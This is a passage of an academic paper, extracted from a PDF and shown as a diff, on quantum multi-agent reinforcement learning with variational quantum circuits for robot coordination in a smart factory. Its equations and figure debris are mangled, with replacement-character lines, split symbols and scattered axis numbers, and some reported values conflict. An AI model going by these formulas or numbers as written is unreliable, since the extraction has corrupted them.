+ leveraged for feedforwarding a state input. Fig. 2 presents
699
+ (a) State encoder in quantum actor
700
+ (b) State encoder in quantum critic
701
+ Fig. 2: The illustration of the state encoder.
702
+ ������������1
703
+ ��������������������������������������������������������������������������
704
+ ������������
705
+ ������������������������������������������������������������������������+1
706
+ ������������
707
+ 2������������������������������������������������������������������������
708
+ ������������
709
+ 2������������������������������������������������������������������������ + 1
710
+ ������������
711
+ 3������������������������������������������������������������������������
712
+ ������������
713
+ VQC
714
+ Block
715
+ 1
716
+ VQC
717
+ Block
718
+ L
719
+ (a) VQC block
720
+ (b) Parameterized circuit
721
+ Fig. 3: The illustration of the parameterized circuit.
722
+ the two schemes of state encoder. Fig. 2(a)/(b) need a single
723
+ gate or two gates per qubit, respectively. Despite the encoding
724
+ system showing the best performance when the number of
725
+ qubits is equal to the number of input variables, the number
726
+ of input variables in RL (i.e., state) must be larger than
727
+ the number of qubits [26]. Thus, this paper considers two
728
+ state encoders under the consideration of the environment, as
729
+ follows,
730
+ U a
731
+ enc(z) =
732
+
733
+ ⊗K
734
+ k=1 (RY (xz
735
+ k))
736
+
737
+ · |0⟩⊗qactor,
738
+ (11)
739
+ U c
740
+ enc(s) =
741
+
742
+ ⊗K′
743
+ k′=1 (RY (xs
744
+ 2k′) · RX(xs
745
+ 2k′−1))
746
+
747
+ · |0⟩⊗qcritic,
748
+ (12)
749
+ where xz
750
+ k and xs
751
+ k′ stand for k-th entry of observation z and k′-
752
+ th entry of state s, respectively. Note that U a
753
+ enc(z) and U c
754
+ enc(s)
755
+ denote an actor observation encoder and critic state encoder.
756
+ The actor observation encoder and critic state encoder work
757
+ in the K and K′ qubits system, respectively.
758
+ 2) Parameterized Circuit and Quantum Measurement: A
759
+ parameterized circuit is a quantum circuit that performs nu-
760
+ merical tasks such as estimation, optimization, approximation,
761
+ and classification using learnable parameters. As shown in
762
+ Fig. 3(a), The VQC block consists of rotating gates with
763
+ different directions and Controlled-Z gate, i.e., RX, RY , RZ,
764
+ and CZ =
765
+
766
+ I
767
+ 0
768
+ 0
769
+ Z
770
+
771
+ . Note that CZ is used to entangle qubits.
772
+ To improve the circuit’s performance, this paper configures the
773
+ parameterized circuit with multi-VQC blocks, which requires
774
+ additional trainable parameters θ as shown in Fig. 3. To obtain
775
+ the desirable outputs, the measurement M is leveraged, which
776
+ calculates the expected value of superpositioned quantum
777
+ states based on its computational basis. In summary, the
778
+ observable (i.e., expected value) is written as follows:
779
+ ⟨O⟩x,θ =
780
+
781
+ M∈M
782
+ ⟨0|U †
783
+ enc(x)U †
784
+ VQC(θ)MUVQC(θ)Uenc(x)|0⟩,
785
+ (13)
786
+ where ⟨O⟩x,θ is the output of VQC with inputs x and circuit
787
+ parameter θ; M is the set of quantum measurement bases in
788
+ VQC with |M| ≤ nqubit.
789
+
790
+ 6
791
+ 3) Implementation on Quantum Actor-Critic: The proposed
792
+ QMARL for a smart factory in this paper is decentralized for
793
+ scalability. Every AMR agent in the QMARL has a VQC-
794
+ based policy, i.e., agents do not require communication among
795
+ agents. The observables of the actor/critic are as follows,
796
+ ⟨Oa⟩o,θ=
797
+
798
+ ⟨0|U a†
799
+ enc(o)U a†
800
+ VQC(θ)MU a
801
+ VQC(θ)U a
802
+ enc(o)|0⟩
803
+
804
+ M∈Ma,
805
+ (14)
806
+ ⟨Oc⟩s,φ=
807
+
808
+ ⟨0|U c†
809
+ enc(s)U c†
810
+ VQC(φ)MU c
811
+ VQC(φ)U c
812
+ enc(s)|0⟩
813
+
814
+ M∈Mc.
815
+ (15)
816
+ Quantum Actor. For the quantum actor, the observable of
817
+ (14) is used to calculate the probabilities of actions of each
818
+ AMR agent. Then, the quantum policy is written via a softmax
819
+ function of its observable,
820
+ πθ(at|zt) = softmax(βa⟨Oa⟩zn
821
+ t ,θ),
822
+ (16)
823
+ where
824
+ softmax(x) ≜
825
+
826
+ ex1
827
+ �N
828
+ i=1 exi ; · · · ;
829
+ exN
830
+ �N
831
+ i=1 exi
832
+
833
+ (17)
834
+ and βa is the scaling factor for an actor observable, respec-
835
+ tively. At the time t, the actor policy of n-th agent makes
836
+ an action-decision with the given observation on
837
+ t , which is
838
+ denoted as πθ(an
839
+ t |on
840
+ t ). Note that θ denotes parameters of n-th
841
+ actor. Then, the action an
842
+ t is computed as follows,
843
+ an
844
+ t = arg max
845
+ a
846
+ πθ(a|on
847
+ t ),
848
+ (18)
849
+ and note all agents use the same policy by parameter sharing.
850
+ Quantum
851
+ Centralized
852
+ Critic. The centralized critic is
853
+ adopted for CTDE as a state-value function. At time t, the
854
+ parameterized critic estimates the discounted returns given at
855
+ as follows:
856
+ Vφ(st) = βc⟨Oc⟩st,φ ≃ E[
857
+ T
858
+
859
+ t′=t
860
+ γt′−t· r(st′,ut′)|st = s],
861
+ (19)
862
+ where γ, T, at, βc, and r(st′, at′) stand for a discounted factor
863
+ γ �� [0, 1), an episode length, the actions of all agents, scaling
864
+ factor for a critic observable and reward functions that the
865
+ state st′ and action a′
866
+ t are given, respectively. In addition, φ
867
+ presents the trainable parameters of a critic. Here, st is the
868
+ ground truth state at t.
869
+ D. Training Algorithm
870
+ The objective of MARL agents is to maximize discounted
871
+ returns. To derive the gradients for the maximization objective,
872
+ we leverage the joint state-value function Vφ. To train Vφ, this
873
+ paper leverages a multi-agent policy gradient (MAPG), which
874
+ is formulated as follows,
875
+ ∇θLactor = −Ea∼πθ
876
+ � T
877
+
878
+ t=1
879
+ N
880
+
881
+ n=1
882
+ yt∇θlog πθ(an
883
+ t |zn
884
+ t )
885
+
886
+ ,
887
+ (20)
888
+ ∇φLcritic = ∇φ
889
+ T
890
+
891
+ t=1
892
+ ∥yt∥2 ,
893
+ (21)
894
+ Algorithm 1: Quantum Multi-AMR Agents Training
895
+ 1 Initialize the critic and actor networks with weights θ
896
+ and φ and the replay buffer D = {};
897
+ 2 Initialize the target networks as: φT ← φ;
898
+ 3 for episode = 1, MaxEpisode do
899
+ 4
900
+ ▷ Initialize Smart Factory Environments;
901
+ 5
902
+ t = 0;
903
+ 6
904
+ s0 = initial state;
905
+ 7
906
+ while st ̸= terminal and t < episode limit do
907
+ 8
908
+ for each agent n do
909
+ 9
910
+ Calculate πθ(a|on
911
+ t ) and sample an
912
+ t ;
913
+ 10
914
+ end
915
+ 11
916
+ Get reward rt and next state and observations
917
+ st+1, ot+1 = {on
918
+ t }N
919
+ n=1;
920
+ 12
921
+ D = D ∪ {(st, ot, at, rt, st+1, ot+1)};
922
+ 13
923
+ t = t + 1;
924
+ 14
925
+ end
926
+ 15
927
+ for each timestep t in each episode in batch D do
928
+ 16
929
+ Get Vφ(st); VφT(st+1);
930
+ 17
931
+ Calculate the target yt with (22);
932
+ 18
933
+ end
934
+ 19
935
+ Calculate ∇θLactor, ∇φLcritic, and update θ, φ;
936
+ 20
937
+ if target update period then
938
+ 21
939
+ Update the target network, φT ← φ
940
+ 22
941
+ end
942
+ 23 end
943
+ TABLE II: The benchmark schemes.
944
+ Schemes
945
+ Computing method
946
+ # of parameters
947
+ Proposed
948
+ Quantum
949
+ ≈ 110
950
+ Comp1
951
+ Quantum/Classical
952
+ ≈ 110
953
+ Comp2
954
+ Classical
955
+ ≈ 110
956
+ Comp3
957
+ Classical
958
+ ≈ 40K
959
+ Comp4
960
+ Random Walk
961
+ None
962
+ subject to
963
+ yt = r(st, at) + γVφT(st+1) − Vφ(st),
964
+ (22)
965
+ where φT is the parameters of target critic network. Note that
966
+ (20) and (21) are for following the parameter-shift rule [43],
967
+ written as follows:
968
+ ∂Lactor
969
+ ∂θi
970
+ = ∂Lactor
971
+ ∂πθ
972
+ ·
973
+ ∂πθ
974
+ ∂⟨O⟩o,θ
975
+ ·
976
+
977
+ ⟨O⟩o,θ+π
978
+ 2 ei−⟨O⟩o,θ−π
979
+ 2 ei
980
+
981
+ , (23)
982
+ ∂Lcritic
983
+ ∂φj
984
+ = ∂Lcritic
985
+ ∂Vφ
986
+ ·
987
+ ∂Vφ
988
+ ∂⟨O⟩s,φ
989
+ ·
990
+
991
+ ⟨O⟩s,φ+π
992
+ 2 ej−⟨O⟩o,φ−π
993
+ 2 ej
994
+
995
+ , (24)
996
+ where ei and ej stand the i- and j-th standard bases of
997
+ parameterized vectors θ and φ, respectively. Note that the two
998
+ left partial derivatives are derived by classical computing, and
999
+ the last term is obtained by quantum computing. The detailed
1000
+ training procedure is presented in Algorithm 1.
1001
+
1002
+ 7
1003
+ Proposed
1004
+ Comp1
1005
+ Comp2
1006
+ Comp3
1007
+ Comp4
1008
+ 0
1009
+ 500
1010
+ 1000
1011
+ Epoch
1012
+ -300
1013
+ -200
1014
+ -100
1015
+ 0
1016
+ Reward
1017
+ 0
1018
+ 500
1019
+ 1000
1020
+ Epoch
1021
+ 87
1022
+ 88
1023
+ 89
1024
+ 90
1025
+ 91
1026
+ 92
1027
+ 93
1028
+ Avg. Precision [%]
1029
+ 0
1030
+ 500
1031
+ 1000
1032
+ Epoch
1033
+ 200
1034
+ 250
1035
+ 300
1036
+ 350
1037
+ Processing Time [minute]
1038
+ 0
1039
+ 500
1040
+ 1000
1041
+ Epoch
1042
+ 0
1043
+ 2
1044
+ 4
1045
+ 6
1046
+ 8
1047
+ 10
1048
+ Avg. Load in AMR [kg]
1049
+ 0
1050
+ 500
1051
+ 1000
1052
+ Epoch
1053
+ 0
1054
+ 200
1055
+ 400
1056
+ 600
1057
+ 800
1058
+ Avg. Load in Warehouse [kg]
1059
+ (a) Total reward
1060
+ (b) Precision
1061
+ (c) Total Processing Time
1062
+ (d) Avg. loaded amount in AMR
1063
+ (e) Avg. loaded amount in warehouse
1064
+ 0
1065
+ 500
1066
+ 1000
1067
+ Epoch
1068
+ 50
1069
+ 100
1070
+ 150
1071
+ 200
1072
+ 250
1073
+ Overflowed in AMR [kg]
1074
+ 0
1075
+ 500
1076
+ 1000
1077
+ Epoch
1078
+ 0
1079
+ 5
1080
+ 10
1081
+ 15
1082
+ 20
1083
+ Overflowed in Warehouse [kg]
1084
+ 0
1085
+ 500
1086
+ 1000
1087
+ Epoch
1088
+ 20
1089
+ 40
1090
+ 60
1091
+ 80
1092
+ 100
1093
+ 120
1094
+ Underflowed in AMR [kg]
1095
+ 0
1096
+ 500
1097
+ 1000
1098
+ Epoch
1099
+ 300
1100
+ 400
1101
+ 500
1102
+ 600
1103
+ 700
1104
+ Underflowed in Server [kg]
1105
+ (f) Overflowed load in AMR
1106
+ (g) Overflowed load in warehouse
1107
+ (h) Underflowed load in AMR
1108
+ (i) Underflowed load in warehouse
1109
+ Fig. 4: The experimental result of various metrics with comparing different MARL frameworks.
1110
+ TABLE III: The experiment parameters.
1111
+ Parameters
1112
+ Values
1113
+ The number of sites (M)
1114
+ 2
1115
+ The number of AMRs (N)
1116
+ 6
1117
+ The load capacity of warehouse
1118
+ 2, 000 kg
1119
+ The load capacity of AMR agent
1120
+ 500 kg
1121
+ Observation dimension
1122
+ 6
1123
+ Precision (Reported [39])
1124
+ {61.9, 95.8, 97.1}%
1125
+ Weight of TFT-LCD (Reported [44])
1126
+ 6 kg
1127
+ Action dimension
1128
+ 5
1129
+ State dimension
1130
+ 8
1131
+ Episode length
1132
+ 30 timestep
1133
+ Reward coefficient (wd, wb, wW )
1134
+ (0.1, 1, 10)
1135
+ Time delay by quality engineers (τqual)
1136
+ 3 timestep
1137
+ Actor observable hyperparameter βa
1138
+ 3
1139
+ Critic observable hyperparameter βc
1140
+ 35
1141
+ Optimizer
1142
+ Adam optimizer
1143
+ The number of gates in U a
1144
+ p and U c
1145
+ p
1146
+ 54
1147
+ The number of qubits of actor
1148
+ 8
1149
+ The number of qubits of critic
1150
+ 8
1151
+ Learning rate of actor
1152
+ 1 × 10−2
1153
+ Learning rate of critic
1154
+ 1 × 10−3
1155
+ Weight decay
1156
+ 1 × 10−5
1157
+ V. PERFORMANCE EVALUATION
1158
+ A. Experimental Setup
1159
+ To verify the effectiveness of the proposed QMARL frame-
1160
+ work for smart factory management (named, Proposed), the
1161
+ proposed QMARL-based algorithm is compared with four
1162
+ comparing methods as listed in Table II. The purpose of these
1163
+ numerical experiments is as follows,
1164
+ • The comparative experiments of Proposed, Comp1,
1165
+ and Comp2 are conducted to corroborate the quantum
1166
+ advantages. The number of parameters is equally set for
1167
+ a fair comparison.
1168
+ • This paper compares Proposed and Comp3 to verify
1169
+ that the proposed method can achieve better performance
1170
+ than the latest MARL technique.
1171
+ • To verify the superiority of MARL, this paper compares
1172
+ MARL schemes to random walk schemes, i.e., Comp4.
1173
+ • To investigate the robustness of quality control, we train
1174
+ benchmark schemes in various environments regarding
1175
+ precision. We validate the fact that the quality of the load
1176
+ is time-varying in the environment. We corroborate the
1177
+ robustness of the quality control in our proposed scheme.
1178
+ The simulation parameter settings are listed in Table III.
1179
+ Because the number of qubits used in this paper is lower
1180
+ than 110, this paper assumes that quantum noise is negligible.
1181
+ Comp1 is a hybrid quantum classical method utilizing A2C
1182
+ critic structure which is proposed and developed in another
1183
+ work [45]. Moreover, Comp2 and Comp3 are based on
1184
+ CTDE structure. Specifically, the value decomposition net-
1185
+ work (VDN) [46]. For a fair comparison, we compose the
1186
+ neural network of linear operations and activation functions
1187
+ (i.e., linear or dense layer). The python software libraries
1188
+ (torchquantum and pytorch) are used for deploying
1189
+ VQCs and DL methods, which support GPU acceleration [16].
1190
+ In addition, all experiments are conducted on a multi-GPU
1191
+ platform (equipped with 2 NVIDIA Titan XP GPUs using a
1192
+ 1405 MHz main clock and 12 GB memory) for training and
1193
+ inferencing/testing.
1194
+ B. Performance of Training
1195
+ Fig. 4 presents the numerical results corresponding to the
1196
+ training metric. This paper adopts total reward, precision,
1197
+
1198
+ 8
1199
+ TABLE IV: The numerical results of various metrics corresponding to the different benchmark schemes.
1200
+ Metric
1201
+ Benchmark Scheme
1202
+ [SI Unit of (a)–(f): kg]
1203
+ Proposed
1204
+ Comp1
1205
+ Comp2
1206
+ Comp3
1207
+ Comp4
1208
+ (a) Avg. load status of AMR
1209
+ 6.0
1210
+ 2.9
1211
+ 9.3
1212
+ 2.9
1213
+ 2.6
1214
+ (b) Avg. load status of server
1215
+ 511
1216
+ 88
1217
+ 87
1218
+ 244
1219
+ 87
1220
+ (c) Avg. overflowed load in AMR
1221
+ 81
1222
+ 101
1223
+ 224
1224
+ 131
1225
+ 103
1226
+ (d) Avg. overflowed load in server
1227
+ 2.6
1228
+ 0
1229
+ 0
1230
+ 5.1
1231
+ 0
1232
+ (e) Avg. underflowed load in AMR
1233
+ 77
1234
+ 106
1235
+ 227
1236
+ 136
1237
+ 100
1238
+ (f) Avg. underflowed load in server
1239
+ 371
1240
+ 628
1241
+ 630
1242
+ 493
1243
+ 579
1244
+ (g) Avg. precision of load [%]
1245
+ 92.1%
1246
+ 90.8%
1247
+ 90.8%
1248
+ 92.2%
1249
+ 89.3%
1250
+ (h) Avg. processing time [Minute]
1251
+ 292
1252
+ 294
1253
+ 255
1254
+ 371
1255
+ 253
1256
+ processing time, and loaded/overflowed/underflowed amount
1257
+ in AMR/server as training metrics. As shown in Fig. 4(a),
1258
+ all training benchmark schemes (i.e., Proposed, Comp1,
1259
+ Comp2 and Comp3) converge to the expected value for
1260
+ each different total reward. Proposed, which utilizes VQCs
1261
+ for both actor and critic network configuration, can observe
1262
+ the increased total reward from the beginning of learning to
1263
+ 980 epochs. Then, the total reward of Proposed achieves
1264
+ the final value of −37. Comp1 and Comp2, which share a
1265
+ common state-value network composed of a small number of
1266
+ parameters, do not evaluate their values properly and cause
1267
+ the reward to exist between −205 and −240. This is lower
1268
+ than −200, which is the expected value of the total reward
1269
+ when a random walk is performed. However, a classical actor
1270
+ and critic composed of a large number of parameters (≈ 40K)
1271
+ show similar performance to the proposed scheme (e.g., ±10
1272
+ performance difference in the total reward).
1273
+ In Proposed and Comp3, policy evaluation and improve-
1274
+ ment are trained to increase the total reward. However, Comp1
1275
+ and Comp2 with classical critic networks composed of small
1276
+ parameters are trained (i.e., actor loss and critic loss are
1277
+ reduced), but not in the direction of reward increasing. In other
1278
+ words, policy evaluation and improvement are not working
1279
+ correctly. The only difference between Proposed and Comp1
1280
+ is whether the critic is a quantum-based or a classical critic,
1281
+ and there is a huge difference in training performance. In
1282
+ addition, compared with Comp3, the number of parameters
1283
+ is 364x lower than that of Comp3, whereas the performances
1284
+ are almost equivalent to each other.
1285
+ C. Feasibility Studies in the LCD Smart Factory Environment
1286
+ This section investigates the proposed model’s performance
1287
+ in LCD smart factory environment. Fig. 4 shows the results
1288
+ of various metrics in the training process, and Table IV
1289
+ shows the performance after training is finished. The result
1290
+ of Table IV represents the average value of inference of
1291
+ 100 iterations. Fig. 4(b–c) represent the average quality and
1292
+ processing time, respectively. Fig. 4(d–i) show the amount of
1293
+ loaded, overflowed, and underflowed load amount generated
1294
+ in warehouse and AMR, respectively. For this simulation, the
1295
+ total amount of overflowed/underflowed loads achieve target
1296
+ performance if the corresponding values become 0. During
1297
+ the training process, it is shown that the values of the two
1298
+ metrics (i.e., the amount of overflowed/underflowed loads) of
1299
+ the Proposed and Comp3 are reduced. Therefore, it can
1300
+ be inferred that Proposed and Comp3 are trained in the
1301
+ correct direction. On the other hand, overflowed loads sparsely
1302
+ occurred in Comp1 and Comp2. However, the underflowed
1303
+ load amount is the highest, which proves that Comp1 and
1304
+ Comp2 are learning in the direction that satisfies only one
1305
+ of the two goals. Furthermore, this tendency also affects the
1306
+ average load status of the warehouse and AMR agents. In the
1307
+ proposed scheme of this paper, it is confirmed that all four
1308
+ values of the indicators continuously decrease until they reach
1309
+ the approximate value of 0. Hence, it is confirmed that the
1310
+ AMR agent has the average load of 3.6 kg in Fig. 4.
1311
+ D. Impact on State Encoding Method
1312
+ According to [31], [47], state-encoding is crucial for the
1313
+ performance of QRL. Therefore, an experiment is designed to
1314
+ demonstrate the importance of state encoding. This experiment
1315
+ aims to transform four random bits into continuous scalar
1316
+ values. The output value is calculated as y = �4
1317
+ i=1 xi∗21−i. In
1318
+ this transformation process, {4, 2, 1} variables dense encoding
1319
+ is carried out to compare the dense encoding methods. Note
1320
+ that the number of parameters in VQCs is identical to 50.
1321
+ The result is shown in Fig. 6, and it is concluded that the
1322
+ performance of 1, 2 variables dense encoding is high while
1323
+ the performance of 4 variables dense encoding is low. In
1324
+ other words, the 2-variables encoding used in this paper has
1325
+ less performance degradation than the 4-variables encoding
1326
+ technique.
1327
+ E. Robustness of Quality Control
1328
+ We design the experiment to investigate the robustness
1329
+ of the proposed framework. To benchmark the robustness,
1330
+ we design the smart factory environment that is time-
1331
+ varying and configure the environment in four phases. In
1332
+ phase 1, the precision of load is randomly selected from
1333
+ {61.9, 95.8, 97.1}%, which is identical to the training envi-
1334
+ ronment. Note that the initial precision follows the uniform
1335
+ distribution U[61.9, 97.1]%. The quality of LCD load carried
1336
+ by each AMR varies with time (e.g., 61.9%, 95.8%, and 97.1%
1337
+ for phase 2, phase 3, and phase 4, respectively). Then, the
1338
+ average precision is measured for 60 minutes to investigate the
1339
+
1340
+ 9
1341
+ Phase I
1342
+ Phase II Phase III Phase IV
1343
+ 95
1344
+ 90
1345
+ 85
1346
+ 80
1347
+ 75
1348
+ 70
1349
+ 0
1350
+ 10
1351
+ 20
1352
+ 30
1353
+ 40
1354
+ 50
1355
+ 60
1356
+ Time [Minute]
1357
+ Avg.
1358
+ Precisio
1359
+
1360
+ n
1361
+
1362
+
1363
+ [%]
1364
+ Fig. 5: The robustness of quality control with time-varying
1365
+ quality of loads.
1366
+ 0
1367
+ 1000
1368
+ 2000
1369
+ 3000
1370
+ 4000
1371
+ 5000
1372
+ Epoch
1373
+ 0
1374
+ 0.2
1375
+ 0.4
1376
+ 0.6
1377
+ 0.8
1378
+ 1
1379
+ Training Loss
1380
+ 1 Variable Dense Encoding
1381
+ 2 Variables Dense Encoding
1382
+ 4 Variables Dense Encoding
1383
+ Fig. 6: The mini-experiment for benchmarking various state
1384
+ encoding methods.
1385
+ robustness of quality control. The result of Fig. 5 represents the
1386
+ average precision value of inference of 100 iterations. During
1387
+ phase 1, the precision records 88.4% on average. At t = 30,
1388
+ the quality of the input load decreases, i.e., the input load’s
1389
+ precision equals 61.9%. Thus, the precision is 72.4%, the
1390
+ lowest precision during the episode. In response to this result,
1391
+ the AMR agents try to improve the precision value during
1392
+ phase 2. On the other hand, the AMR agents do not make
1393
+ actions on quality control in phases 3 and 4 since the quality
1394
+ of input load increases from 61.9% to 97.1%. In summary,
1395
+ the robustness of quality control in our proposed scheme is
1396
+ corroborated by demonstrating the ability of our AMR agents
1397
+ to encounter and cope with the unpredictable quality of input
1398
+ load.
1399
+ F. Discussion
1400
+ This section provides in-depth discussions to explain why
1401
+ the proposed scheme outperforms the other frameworks.
1402
+ 1) Expressibility of Trainable Parameters: The authors of
1403
+ [48] have argued that the parameters of VQCs have more
1404
+ expressibility for quantum neural networks than classical
1405
+ neural networks. The small number of trainable parameters
1406
+ in the RL/MARL regime acts as a vulnerability for the
1407
+ classical neural network. In [30], [31], it is proven that QRL
1408
+ and QMARL can achieve similar performance to a classical
1409
+ RL/MARL. In the results of this paper, the classical neural
1410
+ network with fewer parameters yields lower performance due
1411
+ to two reasons; 1) index embedding on observation, and 2)
1412
+ parameter-shared policy. The index embedding on agents’ ob-
1413
+ servations and the parameter-shared policy method are utilized
1414
+ for faster convergence despite taking a loss in performance.
1415
+ Furthermore, the expressibility capacity of a neural network
1416
+ is also trusted to be sufficient, which is why the two methods
1417
+ introduced above are used [49]. Unfortunately, the degradation
1418
+ in performance is significant regardless of the expressibility
1419
+ capacity. On the other hand, the quantum circuit operates
1420
+ successfully even with a small number of parameters.
1421
+ 2) Dimensional Reduction Corresponding to the State En-
1422
+ coding: Information loss occurs when the input variables
1423
+ are lost by dimensional reduction. In the experiments, the
1424
+ dimension of the input variable is set to four, and the output
1425
+ variable is set to four, two, and one for different schemes,
1426
+ respectively. In four variables dense encoding, the informa-
1427
+ tion loss is severe, because four independent variables are
1428
+ encoded using four rotation gates RY (x4), RY (x3), RZ(x2),
1429
+ and RZ(x1) through a single qubit. In the cases of two
1430
+ variables dense encoding and one variable dense encoding,
1431
+ the dimensional reduction does not occur. This is proven by
1432
+ showing the encoding processes on the Bloch sphere. For two
1433
+ and one variables encoding, the qubits are rotated twice in two
1434
+ orthogonal directions (e.g., y-axis and z-axis directions) and
1435
+ once in one direction, respectively. Consequently, the ranks
1436
+ of the resultant qubits are guaranteed. Therefore, the four
1437
+ variables dense encoding method has the lowest performance
1438
+ and is outperformed by the other aforementioned methods.
1439
+ VI. CONCLUDING REMARKS
1440
+ This work has investigated the design of QMARL agents
1441
+ based on VQCs for autonomous multi-robot control and coor-
1442
+ dination in smart factory management while taking POMDP
1443
+ into consideration. When utilizing AMRs as QMARL agents,
1444
+ the two variables dense encoding method is implemented
1445
+ to reduce the number of qubits in the proposed model. In
1446
+ addition, this paper adopts the parameter-shared policy with
1447
+ index embedding, which can reduce the number of trainable
1448
+ parameters. Using the abovementioned techniques, the quan-
1449
+ tum policy and state-value function are configured to quantum
1450
+ multi-agent actor-critic. The extensive numerical results show
1451
+ the superiority of the proposed QMARL-based AMR control
1452
+ in smart factory management. Finally, the proposed QMARL
1453
+ has an explicit performance gain when using the same number
1454
+ of parameters compared to the classical MARL algorithm and
1455
+ does not suffer from a severe dimensional reduction of data
1456
+ compared to other state-encoding methods.
1457
+ REFERENCES
1458
+ [1] W. J. Yun, Y. Kwak, J. P. Kim, H. Cho, S. Jung, J. Park, and J. Kim,
1459
+ “Quantum multi-agent reinforcement learning via variational quantum
1460
+ circuit design,” in Proceedings of the IEEE International Conference on
1461
+ Distributed Computing Systems (ICDCS), Bologna, Italy, July 2022.
1462
+ [2] W. Na, Y. Lee, N.-N. Dao, D. N. Vu, A. Masood, and S. Cho,
1463
+ “Directional link scheduling for real-time data processing in smart
1464
+ manufacturing system,” IEEE Internet of Things Journal, vol. 5, no. 5,
1465
+ pp. 3661–3671, 2018.
1466
+
1467
+ 10
1468
+ [3] S. Jeong, W. Na, J. Kim, and S. Cho, “Internet of things for smart man-
1469
+ ufacturing system: Trust issues in resource allocation,” IEEE Internet of
1470
+ Things Journal, vol. 5, no. 6, pp. 4418–4427, December 2018.
1471
+ [4] W. Yu, Y. Liu, T. Dillon, W. Rahayu, and F. Mostafa, “An integrated
1472
+ framework for health state monitoring in a smart factory employing IoT
1473
+ and big data techniques,” IEEE Internet of Things Journal, vol. 9, no. 3,
1474
+ pp. 2443–2454, 2022.
1475
+ [5] S. Savazzi, V. Rampa, and U. Spagnolini, “Wireless cloud networks for
1476
+ the factory of things: Connectivity modeling and layout design,” IEEE
1477
+ Internet of Things Journal, vol. 1, no. 2, pp. 180–195, 2014.
1478
+ [6] Y. Jin, B. Huang, Y. Yan, Y. Huan, J. Xu, S. Li, P. Gope, L. Xu, Z. Zou,
1479
+ and L. Zheng, “Edge-based collaborative training system for artificial
1480
+ intelligence-of-things,” IEEE Transactions on Industrial Informatics, pp.
1481
+ 1–1, 2022.
1482
+ [7] Z. Nie and K.-C. Chen, “Hypergraphical real-time multi-robot task allo-
1483
+ cation in a smart factory,” IEEE Transactions on Industrial Informatics,
1484
+ pp. 1–1, 2021.
1485
+ [8] G. Fortino, F. Messina, D. Rosaci, G. M. L. Sarn´e, and C. Savaglio, “A
1486
+ trust-based team formation framework for mobile intelligence in smart
1487
+ factories,” IEEE Transactions on Industrial Informatics, vol. 16, no. 9,
1488
+ pp. 6133–6142, September 2020.
1489
+ [9] S. Jeong, W. Na, J. Kim, and S. Cho, “Internet of things for smart man-
1490
+ ufacturing system: Trust issues in resource allocation,” IEEE Internet of
1491
+ Things Journal, vol. 5, no. 6, pp. 4418–4427, 2018.
1492
+ [10] E. A. Oyekanlu, A. C. Smith, W. P. Thomas, G. Mulroy, D. Hitesh,
1493
+ M. Ramsey, D. J. Kuhn, J. D. Mcghinnis, S. C. Buonavita, N. A. Looper,
1494
+ M. Ng, A. Ng’oma, W. Liu, P. G. Mcbride, M. G. Shultz, C. Cerasi,
1495
+ and D. Sun, “A review of recent advances in automated guided vehicle
1496
+ technologies: Integration challenges and research areas for 5G-based
1497
+ smart manufacturing applications,” IEEE Access, vol. 8, pp. 202 312–
1498
+ 202 353, 2020.
1499
+ [11] W. Xia, J. Goh, C. A. Cortes, Y. Lu, and X. Xu, “Decentralized
1500
+ coordination of autonomous AGVs for flexible factory automation in
1501
+ the context of Industry 4.0,” in Proc. IEEE Int’l Conf. on Automation
1502
+ Science and Engineering (CASE), 2020, pp. 488–493.
1503
+ [12] P.
1504
+ Apte,
1505
+ “What
1506
+ are
1507
+ autonomous
1508
+ mobile
1509
+ robots,
1510
+ and
1511
+ how
1512
+ can
1513
+ they
1514
+ transform
1515
+ manufacturing?”
1516
+ Verizon
1517
+ Business
1518
+ Resources
1519
+ and
1520
+ Industry Insights Articles, October 2021. [Online]. Available: https:
1521
+ //www.verizon.com/business/resources/articles/s/autonomous-mobile-ro
1522
+ bots-can-drive-smart-manufacturing/
1523
+ [13] J. Hu, H. Niu, J. Carrasco, B. Lennox, and F. Arvin, “Voronoi-based
1524
+ multi-robot autonomous exploration in unknown environments via deep
1525
+ reinforcement learning,” IEEE Transactions on Vehicular Technology,
1526
+ vol. 69, no. 12, pp. 14 413–14 423, December 2020.
1527
+ [14] W. J. Yun, S. Park, J. Kim, M. Shin, S. Jung, A. Mohaisen, and J.-H.
1528
+ Kim, “Cooperative multi-agent deep reinforcement learning for reliable
1529
+ surveillance via autonomous multi-UAV control,” IEEE Transactions on
1530
+ Industrial Informatics, pp. 1–1, 2022.
1531
+ [15] M. Schuld and N. Killoran, “Is quantum advantage the right goal for
1532
+ quantum machine learning?” CoRR, vol. abs:2203.01340, 2022.
1533
+ [16] H. Wang, Y. Ding, J. Gu, Z. Li, Y. Lin, D. Z. Pan, F. T. Chong, and
1534
+ S. Han, “QuantumNAS: Noise-adaptive search for robust quantum cir-
1535
+ cuits,” in Proc. IEEE Int’l Symposium on High-Performance Computer
1536
+ Architecture (HPCA), April 2022.
1537
+ [17] W. J. Yun, H. Baek, and J. Kim, “Projection valued measure-based
1538
+ quantum machine learning for multi-class classification,” CoRR, vol.
1539
+ abs/2210.16731, 2022.
1540
+ [18] A. Cornelissen, Y. Hamoudi, and S. Jerbi, “Near-optimal quantum
1541
+ algorithms for multivariate mean estimation,” in Proc. of ACM SIGACT
1542
+ Symposium on Theory of Computing (STOC), New York, NY, USA,
1543
+ 2022, p. 33–43.
1544
+ [19] S. Wiedemann, D. Hein, S. Udluft, and C. Mendl, “Quantum policy
1545
+ iteration via amplitude estimation and grover search–towards quantum
1546
+ advantage for reinforcement learning,” arXiv preprint arXiv:2206.04741,
1547
+ 2022.
1548
+ [20] F. Arute, K. Arya, R. Babbush, D. Bacon, J. C. Bardin, R. Barends,
1549
+ R. Biswas, S. Boixo, F. G. Brandao, D. A. Buell et al., “Quantum
1550
+ supremacy using a programmable superconducting processor,” Nature,
1551
+ vol. 574, no. 7779, pp. 505–510, 2019.
1552
+ [21] S. Oh, J. Choi, and J. Kim, “A tutorial on quantum convolutional neural
1553
+ networks (QCNN),” in Proc. IEEE Int’l Conf. on ICT Convergence
1554
+ (ICTC), October 2020.
1555
+ [22] S. Jerbi, C. Gyurik, S. Marshall, H. J. Briegel, and V. Dunjko, “Vari-
1556
+ ational quantum policies for reinforcement learning,” in Proc. Neural
1557
+ Information Processing Systems (NeurIPS), December 2021.
1558
+ [23] Z. Hong, J. Wang, X. Qu, X. Zhu, J. Liu, and J. Xiao, “Quantum
1559
+ convolutional neural network on protein distance prediction,” in Proc.
1560
+ IEEE Int’l Joint Conf. on Neural Networks (IJCNN), July 2021.
1561
